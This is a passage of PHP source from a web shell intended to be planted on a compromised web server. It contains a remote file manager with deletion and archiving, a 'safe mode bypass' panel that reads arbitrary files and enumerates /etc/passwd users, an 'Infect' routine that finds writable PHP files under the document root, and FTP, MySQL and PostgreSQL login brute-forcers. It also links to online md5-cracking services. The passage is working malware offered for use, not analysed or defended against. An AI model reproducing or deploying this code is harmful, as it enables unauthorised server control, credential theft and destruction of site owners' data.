"dir")\r\n\t\t\t\t\t\t\tdeleteDir($▟);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($▟);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n ex(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\tprototype(\'act\', $_POST[\'p1\']);\r\n\t\t\t\t\tprototype(\'f\', serialize(@$_POST[\'f\']));\r\n\t\t\t\t\tprototype(\'c\', @$_POST[\'c\']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n hardHeader();\r\n\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\r\n\t$dirContent = hardScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';hardFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == \'checkbox\')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => viewPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&&($dirContent[$i] != "."))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction cmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "cmp");\r\n\tusort($dirs, "cmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\r\n\t\t\t.\'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'frame\\\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "<tr id=fak><td colspan=7>\r\n\t<input type=hidden name=ne value=\'\'>\r\n\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n\t<label><select name=\'p1\'>";\r\n\tif(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\r\n echo "<option value=\'paste\'>↳ Paste</option>";\r\n\techo "<option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\r\n if(class_exists(\'ZipArchive\'))\r\n echo "<option value=\'zip\'>+ zip</option><option value=\'unzip\'>- zip</option>";\r\n echo "<option value=\'tar\'>+ tar.gz</option>";\r\n echo "</select></label>";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo " file name: <input type=text name=p2 value=\'hard_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> ";\r\n echo "<input type=\'submit\' value=\'submit\' style=\'margin-left:10px\'></td></tr></form></table></div>";\r\n\thardFooter();\r\n}\r\nfunction actionStringTools() {\r\n\tif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n\tif(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}\r\n\tif(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}\r\n\tif(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\r\n\t$stringTools = array(\r\n\t\t\'Base64 encode\' => \'base64_encode\',\r\n\t\t\'Base64 decode\' => \'base64_decode\',\r\n\t\t\'Url encode\' => \'urlencode\',\r\n\t\t\'Url decode\' => \'urldecode\',\r\n\t\t\'Full urlencode\' => \'full_urlencode\',\r\n\t\t\'md5 hash\' => \'md5\',\r\n\t\t\'sha1 hash\' => \'sha1\',\r\n\t\t\'crypt\' => \'crypt\',\r\n\t\t\'CRC32\' => \'crc32\',\r\n\t\t\'ASCII to HEX\' => \'ascii2hex\',\r\n\t\t\'HEX to ASCII\' => \'hex2ascii\',\r\n\t\t\'HEX to DEC\' => \'hexdec\',\r\n\t\t\'HEX to BIN\' => \'hex2bin\',\r\n\t\t\'DEC to HEX\' => \'dechex\',\r\n\t\t\'DEC to BIN\' => \'decbin\',\r\n\t\t\'BIN to HEX\' => \'binhex\',\r\n\t\t\'BIN to DEC\' => \'bindec\',\r\n\t\t\'String to lower case\' => \'strtolower\',\r\n\t\t\'String to upper case\' => \'strtoupper\',\r\n\t\t\'Htmlspecialchars\' => \'htmlspecialchars\',\r\n\t\t\'String length\' => \'strlen\',\r\n\t);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))\r\n\t\t\techo $_POST[\'p1\']($_POST[\'p2\']);\r\n\t\t$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n\techo \'<h1>String conversions</h1><div class=content>\';\r\n\techo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><label><select name=\'selectTool\'>";\r\n\tforeach($stringTools as $k => $v)\r\n\t\techo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n\t\techo "</select></label><input type=\'submit\' value=\'submit\'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n\t}\r\n\techo"</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>\r\n\t\t\t<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td></td><td><input type=\'submit\' value=\'submit\'></td></tr>\r\n\t\t\t</table></form>";\r\n\tfunction hardRecursiveGlob($path) {\r\n\t\tif(substr($path, -1) != \'/\')\r\n\t\t\t$path.=\'/\';\r\n\t\t$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n\t\tif(is_array($paths)&&@count($paths)) {\r\n\t\t\tforeach($paths as $▟) {\r\n\t\t\t\tif(@is_dir($▟)){\r\n\t\t\t\t\tif($path!=$▟)\r\n\t\t\t\t\t\thardRecursiveGlob($▟);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(empty($_POST[\'p2\']) || @strpos(file_get_contents($▟), $_POST[\'p2\'])!==false)\r\n\t\t\t\t\t\techo "<a href=\'#\' onclick=\'g(\\"FilesTools\\",null,\\"".urlencode($▟)."\\", \\"view\\",\\"\\")\'>".htmlspecialchars($▟)."</a><br>";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(@$_POST[\'p3\'])\r\n\t\thardRecursiveGlob($_POST[\'c\']);\r\n\techo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method=\'post\' target=\'_blank\' name=\'hf\'>\r\n\t\t\t<input type=\'text\' name=\'hash\' style=\'width:330px;\'><br>\r\n <input type=\'hidden\' name=\'act\' value=\'find\'/><br>\r\n\t\t\t<input type=\'submit\' value=\'md5.rednoize.com\' onclick=\\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\\">\r\n\t\t\t<input style=\'margin-left: 20px;\' type=\'submit\' value=\'md5decrypter.com\' onclick=\\"document.hf.action=\'https://www.md5decrypter.com/\';document.hf.submit()\\"><br>\r\n\t\t</form></div>";\r\n\thardFooter();\r\n}\r\nfunction actionSafeMode() {\r\n\t$temp=\'\';\r\n\tob_start();\r\n\tswitch($_POST[\'p1\']) {\r\n\t\tcase 1:\r\n\t\t\t$temp=@tempnam($test, \'cx\');\r\n\t\t\tif(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){\r\n\t\t\t\techo @file_get_contents($temp);\r\n\t\t\t\tunlink($temp);\r\n\t\t\t} else\r\n\t\t\t\techo \'Sorry... Can\\\'t open file\';\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t$files = glob($_POST[\'p2\'].\'*\');\r\n\t\t\tif( is_array($files) )\r\n\t\t\t\tforeach ($files as $filename)\r\n\t\t\t\t\techo $filename."\\n";\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t$ch = curl_init("file://".$_POST[\'p2\']."\\x00".SELF_PATH);\r\n\t\t\tcurl_exec($ch);\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tini_restore("safe_mode");\r\n\t\t\tini_restore("open_basedir");\r\n\t\t\tinclude($_POST[\'p2\']);\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tfor(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n\t\t\t\t$uid = @posix_getpwuid($_POST[\'p2\']);\r\n\t\t\t\tif ($uid)\r\n\t\t\t\t\techo join(\':\',$uid)."\\n";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase 6:\r\n\t\t\tif(!function_exists(\'imap_open\'))break;\r\n\t\t\t$stream = imap_open($_POST[\'p2\'], "", "");\r\n\t\t\tif ($stream == FALSE)\r\n\t\t\t\tbreak;\r\n\t\t\techo imap_body($stream, 1);\r\n\t\t\timap_close($stream);\r\n\t\t\tbreak;\r\n\t}\r\n\t$temp = ob_get_clean();\r\n\thardHeader();\r\n\techo \'<h1>Safe mode bypass</h1><div class=content>\';\r\n\techo \'<span>Copy (read file)</span><form onsubmit=\\\'g(null,null,"1",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\\\'g(null,null,"2",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\\\'g(null,null,"3",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\\\'g(null,null,"4",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\\\'g(null,null,"6",this.param.value);return false;\\\'><input type=text name=param><input type=submit value="submit"></form>\';\r\n\tif($temp)\r\n\t\techo \'<pre class="ml1" style="margin-top:5px" id="Output">\'.$temp.\'</pre>\';\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionLogout() {\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n\tdie("<div align=\'center\'><div class=\'container\'><div class=\'sky\'><div class=\'text\'>THANK YOU & BYE</div><div class=\'stars\'></div><div class=\'stars1\'></div><div class=\'stars2\'></div><div class=\'shooting-stars\'></div></div></div></div>\r\n<style>html{height:100%}html body{width:100%;height:100%;margin:0;font-family:Nunito, sans-serif;}.container{display:block;position:relative;width:100%;height:100%;background:linear-gradient(to bottom,#020107 0,#201b46 100%)}.container .text{color:#fff;position:absolute;top:50%;right:50%;margin:-10px -75px 0 0;font-size:20px;font-family:Nunito, sans-serif;font-weight:700}.shooting-stars{z-index:10;width:5px;height:85px;border-top-left-radius:50%;border-top-right-radius:50%;position:absolute;bottom:0;right:0;background:linear-gradient(to top,rgba(255,255,255,0),#fff);animation:animShootingStar 10s linear infinite}@keyframes animStar{from{transform:translateY(0)}to{transform:translateY(-2560px) translateX(-2560px)}}@keyframes animShootingStar{from{transform:translateY(0) translateX(0) rotate(-45deg);opacity:1;height:5px}to{transform:translateY(-2560px) translateX(-2560px) rotate(-45deg);opacity:1;height:800px}}</style>\r\n<footer id=\'det\' style=\'position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #ff007e; border-bottom: 1px solid #ff007e\'><font face=\'Century Gothic\' color=\'#ff0048\' size=\'5\'><font style=\'font-size: 10pt\' face=\'Century Gothic\'><font face=\'Tahoma\' color=\'#005aff\' size=\'2.5\'><font color=\'#ff007e\'><b> ©opy®ight : </b></font>\r\n<marquee scrollamount=\'3\' scrolldelay=\'60\' width=\'80%\'><b>Twepl & <a href=\'https://github.com/mIcHyAmRaNe\'>mIcHy</a> </b></marquee> </font></font></font></footer>");\r\n}\r\nfunction actionSelfRemove() {\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n hardHeader();\r\n\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n\thardFooter();\r\n}\r\nfunction actionInfect() {\r\n\thardHeader();\r\n\techo \'<h1>Infect</h1><div class=content>\';\r\n\tif($_POST[\'p1\'] == \'infect\') {\r\n\t\t$target=$_SERVER[\'DOCUMENT_ROOT\'];\r\n\t\t\tfunction ListFiles($dir) {\r\n\t\t\t\tif($dh = opendir($dir)) {\r\n\t\t\t\t\t$files = Array();\r\n\t\t\t\t\t$inner_files = Array();\r\n\t\t\t\t\twhile($file = readdir($dh)) {\r\n\t\t\t\t\t\tif($file != "." && $file != "..") {\r\n\t\t\t\t\t\t\tif(is_dir($dir . "/" . $file)) {\r\n\t\t\t\t\t\t\t\t$inner_files = ListFiles($dir . "/" . $file);\r\n\t\t\t\t\t\t\t\tif(is_array($inner_files)) $files = array_merge($files, $inner_files);\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tarray_push($files, $dir . "/" . $file);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\treturn $files;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tforeach (ListFiles($target) as $key=>$file){\r\n\t\t\t\t$nFile = substr($file, -4, 4);\r\n\t\t\t\tif($nFile == ".php" ){\r\n\t\t\t\t\tif(($file<>$_SERVER[\'DOCUMENT_ROOT\'].$_SERVER[\'PHP_SELF\'])&&(is_writeable($file))){\r\n\t\t\t\t\t\techo "$file<br>";\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo "<font color=#a10705 size=14>$i</font>";\r\n\t\t}else{\r\n\t\t\techo "<form method=post><input type=submit value=Infect name=infet></form>";\r\n\t\t\techo \'Really want to infect the server? <a href=# onclick="g(null,null,\\\'infect\\\')">Yes</a></div>\';\r\n\t\t}\r\n\thardFooter();\r\n}\r\nfunction actionBruteforce() {\r\n\thardHeader();\r\n\tif( isset($_POST[\'proto\']) ) {\r\n\t\techo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';\r\n\t\tif( $_POST[\'proto\'] == \'ftp\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$fp = @ftp_connect($ip, $port?$port:21);\r\n\t\t\t\tif(!$fp) return false;\r\n\t\t\t\t$res = @ftp_login($fp, $login, $pass);\r\n\t\t\t\t@ftp_close($fp);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\r\n\t\t\t\t@mysql_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\r\n\t\t\t\t$res = @pg_connect($str);\r\n\t\t\t\t@pg_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$success = 0;\r\n\t\t$attempts = 0;\r\n\t\t$server = explode(":", $_POST[\'server\']);\r\n\t\tif($_POST[\'type\'] == 1) {\r\n\t\t\t$temp = @file(\'/etc/passwd\');\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = explode(":", $line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(@$_POST[\'reverse\']) {\r\n\t\t\t\t\t\t$tmp = "";\r\n\t\t\t\t\t\tfor($i=strlen($line[0])-1; $i>=0; --$i)\r\n\t\t\t\t\t\t\t$tmp .= $line[0][$i];\r\n\t\t\t\t\t\t++$attempts;\r\n\t\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n\t\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t} elseif($_POST[\'type\'] == 2) {\r\n\t\t\t$temp = @file($_POST[\'dict\']);\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = trim($line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}\r\n\t\techo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";\r\n\t}\r\n\techo \'<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'\r\n\t\t.\'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>\'\r\n\t\t.\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\'\r\n\t\t.\'<input type=hidden name=a 